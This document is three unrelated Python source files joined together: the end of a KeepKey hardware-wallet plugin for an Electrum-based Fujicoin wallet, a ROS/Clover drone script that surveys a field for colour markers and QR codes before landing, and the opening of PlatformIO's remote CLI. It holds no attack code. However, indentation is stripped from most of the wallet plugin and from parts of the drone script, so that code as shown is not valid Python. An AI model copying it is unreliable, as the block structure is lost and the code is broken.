        from keepkeylib.transport_webusb import WebUsbTransport
        for d in WebUsbTransport.enumerate():
            if device.id_.startswith(d.getSerialNumber()):
                return WebUsbTransport(d)
        return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
    def _try_webusb(self, device):
        """Attempt a WebUSB connection to *device*; return the transport, or
        None if the connection fails."""
        self.logger.info("Trying to connect over WebUSB...")
        try:
            return self.webusb_transport(device)
        except BaseException as e:
            # Connection failures are logged and reported as "no transport".
            self.logger.info(f"cannot connect at {device.path} {e}")
            return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Fujicoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
full_task.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Импорт библиотек
import math
import time
import cv2
import numpy as np
import rospy
import tf
try:
from clover import srv
except:
from clever import srv
from std_srvs.srv import Trigger
from mavros_msgs.srv import CommandBool
from sensor_msgs.msg import Image
from std_msgs.msg import String
from pyzbar import pyzbar
from cv_bridge import CvBridge
import sys
import threading
import os
from mavros_msgs.srv import CommandBool
arming = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
# sys.path.append('/home/dmitrii/catkin_ws/src/ior2020_uav_L22_AERO')
sys.path.append('/home/pi/catkin_ws/src/ior2020_uav_L22_AERO')
from l22_aero_vision.msg import ColorMarker
from l22_aero_vision.msg import ColorMarkerArray
from l22_aero_vision.src.tools.tf_tools import *
import l22_aero_vision.srv
# Clustering / update tuning constants.
Z_TOL = 0.5
TOLERANCE_COORDS = 0.4  # in meters; max distance for a detection to join a cluster
COORDS_UPDATE_RATE = 1
# ARUCO_TELEM_RATE = 5
# Dictionaries for collected marker coordinates, keyed by marker type.
coordinates = {
    'water': [],
    'pastures': [],
    'seed': [],
    'potato': [],
    'soil': [],
    'water_land': [],
    'seed_land': [],
    'pastures_land': []
}
# Maps detected colour -> crop/marker type.
type_mapping = {
    'blue': 'water',
    'green': 'pastures',
    'yellow': 'seed',
    'red': 'potato',
    'brown': 'soil'
}
# Maps crop type or colour -> landing-circle type.
circle_type_mapping = {
    'seed': 'seed_land',
    'pastures': 'pastures_land',
    'water': 'water_land',
    'blue': 'water_land',
    'green': 'pastures_land',
    'yellow': 'seed_land'
}
rospy.init_node('flight')
# Create service proxy objects for the Clover flight stack.
get_telemetry = rospy.ServiceProxy('get_telemetry', srv.GetTelemetry)
navigate = rospy.ServiceProxy('navigate', srv.Navigate)
navigate_global = rospy.ServiceProxy('navigate_global', srv.NavigateGlobal)
set_position = rospy.ServiceProxy('set_position', srv.SetPosition)
set_velocity = rospy.ServiceProxy('set_velocity', srv.SetVelocity)
set_attitude = rospy.ServiceProxy('set_attitude', srv.SetAttitude)
set_rates = rospy.ServiceProxy('set_rates', srv.SetRates)
land_serv = rospy.ServiceProxy('land', Trigger)
arming = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
v_set_parametrs = rospy.ServiceProxy('/l22_aero_color/set_parametrs', l22_aero_vision.srv.SetParameters)
nav_broadcaster = tf.TransformBroadcaster()
# tf_buffer = tf2_ros.Buffer()
# tf_listener = tf2_ros.TransformListener(tf_buffer)
listener = tf.TransformListener()
#####
Z = 0
def navigate_aruco(x=0, y=0, z=0, yaw=float('nan'), speed=0.4, floor=False):
    """Send a non-blocking navigate command in the aruco_map frame.

    NOTE(review): the `floor` argument is accepted but never forwarded to
    the `navigate` service -- confirm whether that is intentional.
    """
    return navigate(frame_id='aruco_map', x=x, y=y, z=z, yaw=yaw, speed=speed)
def get_telemetry_aruco():
    """Return the current telemetry relative to the aruco_map frame."""
    return get_telemetry(frame_id="aruco_map")
def takeoff(z):
    """Arm, climb to altitude `z`, then hold the starting x/y in aruco_map."""
    start = get_telemetry_aruco()
    navigate(z=z, speed=0.3, frame_id="body", auto_arm=True)
    rospy.sleep(2)
    navigate_aruco(x=start.x, y=start.y, z=z, speed=0.4, floor=True)
def navigate_wait(x, y, z, yaw=float('nan'), speed=0.2, tolerance=0.13):
    """Fly to (x, y, z) in aruco_map and block until within `tolerance` metres."""
    navigate_aruco(x=x, y=y, z=z, yaw=yaw, speed=speed)
    while not rospy.is_shutdown():
        # navigate_target frame: telemetry is the remaining offset to the goal.
        offset = get_telemetry(frame_id="navigate_target")
        remaining = math.sqrt(offset.x ** 2 + offset.y ** 2 + offset.z ** 2)
        if remaining < tolerance:
            break
        rospy.sleep(0.2)
def land():
    '''
    Land the drone: call the landing service, wait briefly for touchdown,
    then force-disarm the motors.
    '''
    land_serv()
    rospy.sleep(0.79)
    arming(False)
class ColorMarkerMap:
    """A colour marker with coordinates in the map, camera and image frames."""

    def __init__(self, cx_map=0, cy_map=0, cz_map=0, cx_img=0, cy_img=0, color="none", cx_cam=0, cy_cam=0, cz_cam=0):
        self.color = color
        # Coordinates in the aruco_map frame.
        self.cx_map, self.cy_map, self.cz_map = cx_map, cy_map, cz_map
        # Coordinates in the camera optical frame.
        self.cx_cam, self.cy_cam, self.cz_cam = cx_cam, cy_cam, cz_cam
        # Pixel coordinates in the image.
        self.cx_img, self.cy_img = cx_img, cy_img

    def __str__(self):
        return "color: {}\n coords map: {} {} {}".format(
            self.color, str(self.cx_map), str(self.cy_map), str(self.cz_map))
class Recognition:
    def __init__(self):
        '''
        Initialize state.
        Subscribes to the main_camera image topic and to the colour-marker /
        landing-circle topics, and creates a debug publisher for QR detection.
        '''
        self.barcodeData = None
        self.bridge = CvBridge()
        self.cv_image = np.zeros((240, 320, 3), dtype="uint8")
        self.image_sub = rospy.Subscriber('image_raw', Image, self.image_callback)
        self.qr_pub = rospy.Publisher('/qr_debug', Image, queue_size=1)
        self.coords_sub = rospy.Subscriber("/l22_aero_color/markers", ColorMarkerArray, self.markers_arr_clb)
        self.circles_sub = rospy.Subscriber("/l22_aero_color/circles", ColorMarkerArray, self.circles_arr_clb)
        self.result = []   # pending colour-marker detections (map frame)
        self.circles = []  # pending landing-circle detections (map frame)
        self.coords_thread = threading.Thread(target=self.coords_thread_func)
        self.coords_thread.daemon = True
        # self.coords_thread.start()

    def transform_marker(self, marker, frame_to="aruco_map"):# -> ColorMarkerMap:
        '''
        Transform a marker's camera-frame coordinates into `frame_to`.
        On TF failure the map coordinates stay (0, 0, 0).
        '''
        cx_map = 0
        cy_map = 0
        cz_map = 0
        try:
            cx_map, cy_map, cz_map, _ = transform_xyz_yaw(
                marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", frame_to, listener)
        except (tf.LookupException, tf.ConnectivityException):
            print("TF error")
        return ColorMarkerMap(color=marker.color, cx_map=cx_map, cy_map=cy_map, cz_map=cz_map,
                              cx_cam=marker.cx_cam, cy_cam=marker.cy_cam, cz_cam=marker.cz_cam)

    def markers_arr_clb(self, msg):
        '''
        Callback: collect colour-marker coordinates from the topic.
        '''
        # self.result = []
        for marker in msg.markers:
            self.result.append(self.transform_marker(marker, frame_to="aruco_map"))

    def circles_arr_clb(self, msg):
        '''
        Callback: collect landing-circle coordinates from the topic.
        '''
        # self.circles = []
        for marker in msg.markers:
            self.circles.append(self.transform_marker(marker, frame_to="aruco_map"))

    def image_callback(self, data):
        '''
        Callback: store the latest camera frame, resized to 320x240.
        '''
        self.cv_image = cv2.resize(self.bridge.imgmsg_to_cv2(data, 'bgr8'), (320, 240))

    def most_frequent(self, arr):
        '''
        Return the value that occurs most often in the array.
        '''
        return max(set(arr), key = arr.count)

    def distance(self, coord1, coord2):
        '''
        Euclidean distance between two 2D points.
        '''
        return ((coord1[0] - coord2[0])**2 + (coord1[1] - coord2[1])**2)**0.5

    def average(self, coord1, coord2):
        '''
        Midpoint of two 2D points.
        '''
        return ((coord1[0] + coord2[0])/2, (coord1[1] + coord2[1])/2)

    def coordsFunc(self):
        # global Z
        '''
        Cluster the pending detections into the global `coordinates` dict:
        each detection either joins the nearest existing cluster (within
        TOLERANCE_COORDS) or starts a new one. Pending lists are then cleared.
        '''
        global coordinates
        # Z = get_telemetry_aruco().z
        for i in range(len(self.result)):
            # Normalise the key: raw colour names map to crop types.
            if self.result[i].color not in coordinates:
                color = type_mapping[self.result[i].color]
            else:
                color = self.result[i].color
            # if (self.result[i].cz_map - Z) < Z_TOL:
            tempCoords = (self.result[i].cx_map, self.result[i].cy_map)
            # Discard detections clearly outside the field.
            if tempCoords[0] < -1.5 or tempCoords[1] < -1.5: continue
            if len(coordinates[color]) == 0:
                coordinates[color].append(np.array([np.array(tempCoords)]))
            else:
                for j in range(len(coordinates[color])):
                    if self.distance(coordinates[color][j].mean(axis=0), tempCoords) <= TOLERANCE_COORDS:
                        coordinates[color][j] = np.append(coordinates[color][j], np.array([tempCoords]), axis=0)
                        break
                else:
                    # for/else: no cluster was close enough -> start a new one.
                    coordinates[color].append(np.array([np.array(tempCoords)]))
        self.result = []
        for i in range(len(self.circles)):
            if self.circles[i].color not in coordinates:
                color = circle_type_mapping[self.circles[i].color]
            else:
                color = self.circles[i].color
            tempCoords = [self.circles[i].cx_map, self.circles[i].cy_map]
            if tempCoords[0] < -1 or tempCoords[1] < -1: continue  # DELETE IF NEEDED!
            if len(coordinates[color]) == 0:
                coordinates[color].append(np.array([np.array(tempCoords)]))
            else:
                for j in range(len(coordinates[color])):
                    if self.distance(coordinates[color][j].mean(axis=0), tempCoords) <= TOLERANCE_COORDS:
                        coordinates[color][j] = np.append(coordinates[color][j], np.array([tempCoords]), axis=0)
                        break
                else:
                    # for/else: no cluster was close enough -> start a new one.
                    coordinates[color].append(np.array([np.array(tempCoords)]))
        self.circles = []

    def coords_thread_func(self):
        # Background loop: re-cluster pending detections at COORDS_UPDATE_RATE Hz.
        r = rospy.Rate(COORDS_UPDATE_RATE)
        while True:
            self.coordsFunc()
            r.sleep()

    def waitDataQR(self):
        '''
        Detect QR codes in the current frame, publish a debug image with the
        detection circled, and return the last decoded payload (or the
        previous one if nothing was decoded this frame).
        '''
        gray = cv2.cvtColor(self.cv_image, cv2.COLOR_BGR2GRAY)
        barcodes = pyzbar.decode(gray)
        for barcode in barcodes:
            (x, y, w, h) = barcode.rect
            self.barcodeData = barcode.data.decode("utf-8")
            xc = x + w/2
            yc = y + h/2
            self.cv_image = cv2.circle(self.cv_image, (int(xc), int(yc)), 15, (0, 0, 0), 30)
            self.qr_pub.publish(self.bridge.cv2_to_imgmsg(self.cv_image, 'bgr8'))
        return self.barcodeData
# Create the recognition object (starts camera/marker subscribers).
rc = Recognition()
z = 1.5  # cruise altitude, m
FIELD_LENGTH_X = 2.83 #in meters
FIELD_LENGTH_Y = 2.65 #in meters
deltaX = 0.65 #in meters; spacing between sweep columns
deltaY = 0.25 #in meters; spacing between points in a column
betweenX = 3  # number of connector segments between columns
LANDING_B = 5
i, count = 0.1, 0  # i: current column x-coordinate; count: column counter
points = []  # zig-zag waypoints over the field
def getAdditionalPoints(coord1, coord2, parts, xyz=0):
    '''
    Return `parts` + 1 evenly spaced points from coord1 to coord2, inclusive.
    Coordinates are 2D by default; pass a truthy `xyz` for 3D points.
    '''
    dims = 3 if xyz else 2
    axes = [np.linspace(coord1[k], coord2[k], parts + 1) for k in range(dims)]
    return zip(*axes)
# Создание массива с точками для дальнейшего полета по полю (полет по зиг-загу)
while i <= FIELD_LENGTH_X:
j = 0.1
while j <= FIELD_LENGTH_Y:
if count % 2 == 0:
points.append((i, j))
else:
points.append((i, FIELD_LENGTH_Y-j))
j += deltaY
d = j - FIELD_LENGTH_Y
if d > 0: j -= d
if count % 2 == 0 and i != len(points) - 1:
points += list(getAdditionalPoints((i, j), (i + deltaX, j), betweenX))
elif count % 2 != 0 and i != len(points) - 1:
points += list(getAdditionalPoints((i, FIELD_LENGTH_Y - j), (i + deltaX, FIELD_LENGTH_Y-j), betweenX))
i += deltaX
count += 1
if points[-1][0] > FIELD_LENGTH_X:
points = points[:-3]
# takeoff
takeoff(z)
navigate_wait(0.15, 0.15, 1.2)
# QR-code recognition
qrs = []
qr = 'seed'  # fallback crop type if nothing is decoded
zLower = 1.05
# fly around the QR code to improve recognition from several viewpoints
for (x_new, y_new) in [(0.12, 0.15), (0.18, 0.05), (0.20, 0.05), (0.23, 0.2), (0.2, 0.25), (0.15, 0.15)]:
    navigate_wait(x_new, y_new, zLower)
    qrs.append(rc.waitDataQR())
    rospy.sleep(0.55)
# majority vote over the collected decodes; fall back to 'seed'
if len(qrs) > 0:
    qr = rc.most_frequent(qrs)
if qr == None:
    qr = 'seed'
print(".....")
print(qr)
navigate_wait(0.15, 0.1, z)
# fly over the field along the zig-zag, clustering detections at each waypoint
for point in points:
    '''
    if points.index(point) == int(len(points) // 4):
        break
    '''
    navigate_wait(x=point[0], y=point[1], z=z, speed=0.4, yaw=3.14/2.0)
    rospy.sleep(0.3)
    rc.coordsFunc()
    rospy.sleep(0.3)
print("739")
# for (x_new, y_new) in [(0.75*FIELD_LENGTH_X, 0.75*FIELD_LENGTH_Y), (0.75*FIELD_LENGTH_X, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, 0.75*FIELD_LENGTH_Y)]:
#     navigate_wait(x_new, y_new, 2.1)
#     rospy.sleep(1)
print(coordinates[circle_type_mapping[qr]])
# determine the landing coordinates: centre of the largest cluster of the
# landing-circle type matching the QR code; (1, 1) if none were seen
if len(coordinates[circle_type_mapping[qr]]) == 0:
    landCoordinate = (1, 1)
    print("1, 1")
else:
    landCoordinate = max(coordinates[circle_type_mapping[qr]], key=len).mean(axis=0)
print("landCoordinate", landCoordinate)
print("746")
# approach the landing point in stages at cruise altitude
telem = get_telemetry_aruco()
for (x_new, y_new) in list(getAdditionalPoints((telem.x, telem.y), landCoordinate, 3)):
    navigate_wait(x_new, y_new, z)
navigate_wait(landCoordinate[0], landCoordinate[1], z)
print("749")
print('WRITING CSV WITH COORDINATES')
print(coordinates)
# Create a CSV file with the clustered marker coordinates
if not os.path.exists(os.environ['HOME']+"/L22_AERO_LOG"):
    os.mkdir(os.environ['HOME']+"/L22_AERO_LOG")
import csv
# from time import time
with open(os.environ['HOME']+"/L22_AERO_LOG/" + 'L22_AERO_result.csv', 'w') as f:
    writer = csv.writer(f)
    writer.writerow(["Sector", "Type", "x (cm)", "y (cm)"])
    arr = []
    for key in coordinates:
        # landing circles are not part of the report
        if key in ['water_land', 'seed_land', 'pastures_land']: continue
        for j in range(len(coordinates[key])):
            point = coordinates[key][j].mean(axis=0)  # cluster centre, metres
            x = point[0]
            y = point[1]
            # assign the field quadrant (A..D) by the cluster centre
            if x < FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
                arr.append(['C', key, x*100, y*100])
            elif x < FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
                arr.append(['A', key, x*100, y*100])
            elif x >= FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
                arr.append(['D', key, x*100, y*100])
            elif x >= FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
                arr.append(['B', key, x*100, y*100])
    arr.sort(key = lambda x: x[0])
    writer.writerows(arr)
    writer.writerow(['','','',''])
    writer.writerow(['','','',''])
    writer.writerow(['','','',''])
    writer.writerow(['','','',''])
    writer.writerow(['TIME:', str(time.time()), 'TIME:', str(time.time())])
print('CSV SAVED')
telem = get_telemetry_aruco()
last = None  # last circle snapshot used for guidance
Z_LAND = 0.85
# staged vertical descent path above the landing coordinate
landingPath = list(getAdditionalPoints((landCoordinate[0], landCoordinate[1], z), (landCoordinate[0], landCoordinate[1], Z_LAND), 3, xyz = 1))
print(landingPath)
j = 0
print("756")
markerType = circle_type_mapping[qr]
# descend step by step, re-centering on a matching circle when one is seen
while j < len(landingPath):
    print(i, j)
    print(rc.circles)
    circles_copy = list(rc.circles)
    if len(circles_copy) > 0:
        for i in range(len(circles_copy)):
            # accept a circle only if it is near the target and of the right type
            if rc.distance((circles_copy[i].cx_map, circles_copy[i].cy_map), landCoordinate) <= 0.6 and circle_type_mapping[circles_copy[i].color] == markerType:
                navigate_wait(circles_copy[i].cx_map, circles_copy[i].cy_map, landingPath[j][2], tolerance=0.15)
                last = list(circles_copy)
                break
        else:
            # for/else: no acceptable circle in this batch
            circles_copy = []
    j += 1
# NOTE(review): after the loop circles_copy holds only the last iteration's
# batch, so the elif branch is unreachable when it was cleared -- confirm.
if len(circles_copy) == 0:
    if last == None:
        navigate_wait(landCoordinate[0], landCoordinate[1], 1.5)
elif len(circles_copy) > 0:
    navigate_wait(circles_copy[-1].cx_map, circles_copy[-1].cy_map, 1.5)
telem = get_telemetry_aruco()
print("777")
# LANDING SYSTEM
print("markerType_LANDING", markerType)
print("STAGE2")
time_st = time.time()
TIMEOUT_H = 2.85  # seconds allotted for the visual-servoing stage
landing_update_rate = rospy.Rate(3.7)
# OFFSET = [2, 2] # pixels
while (time.time() - time_st) < TIMEOUT_H:
    markers = [i for i in rc.circles if circle_type_mapping[i.color] == markerType]
    rc.circles = []
    rc.result = []
    print(markers)
    if len(markers) > 0:
        marker = markers[0]
        # convert the circle position into the body frame for direct servoing
        x_b, y_b, z_b, _ = transform_xyz_yaw(
            marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", "body", listener)
        # nav_broadcaster.sendTransform(
        #     (x_b, y_b, z_b),
        #     tf.transformations.quaternion_from_euler(0, 0, 0),
        #     rospy.Time.now(),
        #     "landing_target",
        #     "body"
        # )
        rospy.sleep(0.087)
        print(x_b, y_b, z_b)
        # slight negative z drives a slow descent while centering
        set_position(x=x_b, y=y_b, z=-0.076, frame_id="body")
        if abs(z_b) < 0.2:
            break
    landing_update_rate.sleep()
print("LANDDDDDDDDDDDDDDDD")
land()
# vr.stop()
rospy.sleep(1.5)
print("DISARM")
arming(False)
print('DONE')
|
remote.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
from os import getcwd
from os.path import isfile, join
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs
from platformio.commands.device import device_monitor as cmd_device_monitor
from platformio.compat import get_file_contents
from platformio.managers.core import pioplus_call
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
    """Top-level `pio remote` group; options are consumed by PIO Plus."""
    pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
    """Subcommand group for managing remote agents."""
    pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
    "-d",
    "--working-dir",
    envvar="PLATFORMIO_REMOTE_AGENT_DIR",
    type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(**kwargs):
    """Delegate `remote agent start` to the PIO Plus binary (raw argv)."""
    pioplus_call(sys.argv[1:])
